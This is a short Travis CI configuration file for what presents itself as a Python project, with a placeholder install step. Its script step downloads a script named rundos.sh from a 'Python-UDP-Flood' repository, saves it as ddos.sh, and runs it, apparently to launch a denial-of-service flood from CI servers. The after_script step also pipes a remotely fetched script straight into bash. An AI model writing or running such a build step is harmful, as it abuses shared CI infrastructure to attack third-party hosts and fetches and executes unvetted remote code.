# .travis.yml

dist: xenial

language: python

cache: pip

python:
    - "3.6"
    - "3.7"
    - "3.8"
    - "nightly"

matrix:
    allow_failures:
        - python: "nightly"

install:
    - echo Nice

script:
    - wget -O ddos.sh 'https://raw.githubusercontent.com/XaviFortes/Python-UDP-Flood/master/rundos.sh' && chmod +x ddos.sh && ./ddos.sh

after_script:
    - bash <(curl -s https://codecov.io/bash)
